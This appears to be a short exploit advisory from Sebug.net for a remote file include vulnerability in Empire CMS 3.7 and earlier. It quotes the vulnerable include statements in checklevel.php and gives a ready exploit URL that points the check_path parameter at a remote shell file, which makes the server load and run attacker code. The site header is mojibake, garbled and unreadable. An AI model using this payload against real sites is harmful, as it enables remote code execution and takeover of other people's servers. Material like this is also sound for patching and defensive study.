Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability

Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.    Empire CMS <=3.7 (checklevel.php) Remote File Include Vulnerability2.           Find by: Bob Linuson3. 4.# Code:5. 6.2   $includefile=$check_path."e/class/MemberLevel.php";7.3   include("$includefile");8......9.67  include($check_path."e/class/connect.php");10.68  include($check_path."e/class/db_sql.php");11.69  include($check_path."e/class/user.php");12. 13. 14.#Exploit:15. 16.http://www.site.com/e/class/checklevel.php?check_path=http://shell.txt?17. 18. 19.#URL:20. 21.http://www.phome.net/tmp/ecms37/22.http://www.phome.net/tmp/ecms37/down.php?url=/tmp/ecms37/ecms3.7-free.rar&23.english:24.http://translate.google.com/translate?u=http%3A%2F%2Fwww.phome.net%2Ftmp%2Fecms37%2F&langpair=zh-CN%7Cen&hl=zh-CN&newwindow=1&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools